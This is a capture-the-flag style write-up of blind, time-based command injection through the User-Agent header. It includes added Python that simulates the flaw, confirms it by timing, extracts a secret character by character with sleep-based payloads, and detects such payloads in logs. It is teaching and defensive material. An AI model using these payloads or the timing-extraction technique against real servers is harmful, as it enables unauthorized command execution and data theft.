Some vulnerabilities shout.
Errors. Crashes. Weird responses.
But today's bug was different.
The server said nothing.
No output. No message. No error.
Just… silence.
And a 10-second pause.
The Setup
This lab had another command injection challenge.
But this one was trickier.
The application didn't display command output in the response.
Which meant even if a command executed…
You wouldn't see it.
The injection point was hidden somewhere unexpected.
Not a form. Not a URL parameter.
An HTTP header.
Specifically:
User-Agent
Yes, the same header that usually just tells servers what browser you're using.
But what if the server doesn't just read it…
What if it executes it?
The Experiment
To test this idea, I intercepted the request using Burp Suite.
Then I modified the User-Agent header.
Instead of something normal like:
Mozilla/5.0
I appended a command separator and a delay command:
; sleep 10
So the header became:
Mozilla/5.0; sleep 10
Which tells the shell on the server:
Run whatever command it normally runs…
Then run sleep for 10 seconds.
Then return the response.
(If the header value sits inside quotes in the server's command, the payload has to close that quote first, otherwise the separator is just part of the string.)
Then I forwarded the request.
The Result
The page loaded.
But something felt off.
The response didn't come back immediately.
It waited.
1 second⦠3 seconds⦠7 secondsā¦
Then the response appeared.
Exactly 10 seconds later.
The page looked normal.
But the delay told the whole story.
The command executed.
The server just never showed the output.
One slow response on its own can be coincidence (a busy server, a slow link), so the confirmation is to change the number, say sleep 5 and then sleep 20, and check that the delay follows it.
Why This Works
Some applications pass header values straight into an operating-system command.
Something like:
system("log_user_agent " . $user_agent);
Here $user_agent is whatever the client sent (in PHP that is $_SERVER['HTTP_USER_AGENT']), and system() hands the whole string to a shell.
If the header contains shell command separators such as:
; & && | || $( ) ` or a newline
the shell treats whatever follows them as additional commands.
Even if the output is never returned to the client, the commands still run.
And timing becomes the signal.
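To make the timing signal concrete, here is an added Python example. It is not the lab's code and not the post author's; it simulates the vulnerable sink and the probe locally. echo stands in for the hypothetical log_user_agent program, and a "request" is a local function call rather than an HTTP request through Burp, so everything runs offline. The hardened form (argument list, no shell) is included so the probe has something to fail against, which is the fix the post arrives at below.

```python
import subprocess
import time

# Constructed stand-in for the page's log_user_agent program: "echo" is used so
# the example runs anywhere with a POSIX shell. Nothing here is the lab's code.
LOGGER_COMMAND = "echo"


def log_user_agent_vulnerable(user_agent: str) -> None:
    """The bug: the header value is pasted into a shell command string.

    Equivalent to the PHP system("log_user_agent " . $user_agent) above.
    shell=True hands the string to /bin/sh, so ';' '&&' '|' '$( )' and
    backticks inside the header are interpreted as command syntax.
    """
    subprocess.run(f"{LOGGER_COMMAND} {user_agent} >/dev/null",
                   shell=True, check=False)


def log_user_agent_safe(user_agent: str) -> None:
    """The fix: no shell. The value travels as one argv element, so
    '; sleep 10' is just text that echo prints, never something that runs."""
    subprocess.run([LOGGER_COMMAND, user_agent],
                   stdout=subprocess.DEVNULL, check=False)


def sleep_payload(base_user_agent: str, seconds: int) -> str:
    """Keep the normal header value and append a separator plus a delay,
    e.g. 'Mozilla/5.0; sleep 10'."""
    return f"{base_user_agent}; sleep {seconds}"


def response_time(sink, user_agent: str) -> float:
    """Time one simulated request, the way Burp's response timer would."""
    start = time.monotonic()
    sink(user_agent)
    return time.monotonic() - start


def confirm_time_based_injection(sink, base_user_agent: str = "Mozilla/5.0",
                                 delays=(1, 2), tolerance: float = 0.8) -> bool:
    """Return True only if the response delay tracks the requested sleep.

    A single slow response can be network jitter or a busy server, so the
    probe is sent with two different sleep values and each must add at
    least tolerance * seconds on top of the baseline response time.
    """
    baseline = response_time(sink, base_user_agent)
    for seconds in delays:
        extra = response_time(sink, sleep_payload(base_user_agent, seconds)) - baseline
        if extra < seconds * tolerance:
            return False
    return True


if __name__ == "__main__":
    print("vulnerable sink injectable:",
          confirm_time_based_injection(log_user_agent_vulnerable))
    print("safe sink injectable:      ",
          confirm_time_based_injection(log_user_agent_safe))
```

Against a real target, response_time would wrap an HTTP request with the crafted User-Agent header; the decision logic stays the same.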
Think About This
Imagine asking someone a secret question.
If the answer is yes, they wait 10 seconds before replying.
If the answer is no, they reply instantly.
You never hear the answer.
But the delay tells you everything.
That's blind, time-based command injection.
Why This Is Dangerous
Even without visible output, attackers can still:
• Execute system commands
• Extract data using timing techniques (one yes/no question per character)
• Install malicious tools
• Move deeper into the infrastructure
• Eventually take over the server
All from a hidden header.
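The "extract data using timing techniques" bullet deserves a worked example. The following added Python code (not part of the original post or lab) reuses the same simulated vulnerable sink and turns the sleep into a yes/no oracle: each probe asks whether one character of a command's output equals a guess, and only a correct guess pays the delay. The secret is read from a constructed LAB_SECRET environment variable that stands in for what a real attacker would read, such as the output of whoami.

```python
import os
import subprocess
import time

# Constructed secret standing in for what an attacker would really read
# (whoami output, a line of /etc/passwd, ...). Not from the lab.
LAB_ENV = {**os.environ, "LAB_SECRET": "c0de"}
CHARSET = "0123456789abcdef"   # small alphabet keeps the demo quick
SLEEP_SECONDS = 1
THRESHOLD = SLEEP_SECONDS * 0.5  # a probe slower than this counts as "yes"


def log_user_agent_vulnerable(user_agent: str) -> None:
    """Same bug as before: the header value is concatenated into a shell
    string (echo stands in for the page's log_user_agent program)."""
    subprocess.run(f"echo {user_agent} >/dev/null",
                   shell=True, check=False, env=LAB_ENV)


def timed(sink, user_agent: str) -> float:
    """Elapsed seconds for one simulated request."""
    start = time.monotonic()
    sink(user_agent)
    return time.monotonic() - start


def guess_payload(source: str, position: int, char: str) -> str:
    """One yes/no question: is character `position` (1-based) of the output
    of shell command `source` equal to `char`? Yes sleeps, no returns at once."""
    return (f'Mozilla/5.0; [ "$({source} | cut -c{position})" = "{char}" ]'
            f' && sleep {SLEEP_SECONDS}')


def extract_by_timing(sink, source: str, charset: str = CHARSET,
                      max_len: int = 32) -> str:
    """Recover the output of `source` one character at a time.

    A position where no character in the charset triggers the delay means
    we have run off the end of the string, so extraction stops there.
    """
    recovered = ""
    for position in range(1, max_len + 1):
        for char in charset:
            if timed(sink, guess_payload(source, position, char)) >= THRESHOLD:
                recovered += char
                break
        else:
            return recovered
    return recovered


if __name__ == "__main__":
    # In a real engagement `source` would be something like `whoami`.
    print(extract_by_timing(log_user_agent_vulnerable, 'printf %s "$LAB_SECRET"'))
```

Each character costs up to len(charset) requests and exactly one delay, which is why real tooling uses a binary search over the character's byte value and a shorter sleep; the oracle itself is the same.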
The Fix
Servers must never execute OS commands using user-controlled headers.
Instead:
• Never build a shell command string from a header value; if a program must be run, pass the value as a separate argument (an argument list, not a shell)
• Avoid shell execution entirely where possible
• Use library APIs instead of system calls (write the log entry with the logging library rather than by running a command)
• Apply strict allowlists where the format allows it; a User-Agent legitimately contains ";" and parentheses, so sanitizing it is not a substitute for keeping it away from a shell
• Monitor unusual response delays and headers that contain command syntax
Security rule: If the server executes hidden input, attackers listen for time.
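For the "monitor unusual response delays" item, here is an added Python detection snippet (mine, not from the post or lab). It scans constructed Apache combined log lines with the response time appended in microseconds (Apache's %D format field) and flags requests whose User-Agent contains a shell separator followed by a delay or egress command, or whose response time is far above normal. The log lines and addresses are made up for the example. Timing alone produces false positives (the last sample line is a legitimately slow report), so the two signals are reported separately.

```python
import re
from typing import List, Optional

# Constructed Apache "combined" log lines with %D (microseconds) appended.
# Not real traffic; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2024:10:01:02 +0000] "GET /product?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" 18342
203.0.113.10 - - [12/Mar/2024:10:01:09 +0000] "GET /product?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0; sleep 10" 10021877
198.51.100.7 - - [12/Mar/2024:10:01:11 +0000] "GET /feedback HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64)" 21004
203.0.113.10 - - [12/Mar/2024:10:01:25 +0000] "GET /product?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 || ping -c 10 127.0.0.1" 10033910
198.51.100.7 - - [12/Mar/2024:10:01:40 +0000] "GET /report HTTP/1.1" 200 90122 "-" "Mozilla/5.0 (X11; Linux x86_64)" 7400210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)" (?P<us>\d+)$'
)

# A separator ('; && || | & $( `') followed by a command typically used for
# blind probing (delay) or out-of-band egress. A bare ';' is NOT enough:
# legitimate User-Agents such as "Windows NT 10.0; Win64; x64" contain it.
INJECTION_RE = re.compile(
    r"(?:;|&&|\|\||\||&|\$\(|`)\s*(?:sleep|ping|timeout|curl|wget|nslookup)\b"
)


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["us"] = int(entry["us"])
    return entry


def find_suspicious(log_text: str, slow_us: int = 5_000_000) -> List[dict]:
    """Flag requests with command syntax in the User-Agent and/or an
    unusually slow response. Each finding lists the reasons separately so
    an analyst can tell a timing outlier from a payload sighting."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = []
        if INJECTION_RE.search(entry["ua"]):
            reasons.append("shell separator followed by delay/egress command in User-Agent")
        if entry["us"] >= slow_us:
            reasons.append(f"response took {entry['us'] / 1e6:.1f}s")
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "ua": entry["ua"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["ts"], f["ip"], repr(f["ua"]), "->", "; ".join(f["reasons"]))
```

Tune slow_us to the endpoint's normal latency; the combination of a payload pattern and a matching delay from the same client is the high-confidence case.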
Day 24 Takeaway
Today the server didn't print anything.
It didn't reveal command output.
It didn't show errors.
But time told the truth.
Because sometimes…
The most dangerous vulnerabilities don't speak.
They just wait.
LESS GOOO

When the server stays silent⦠time becomes the answer.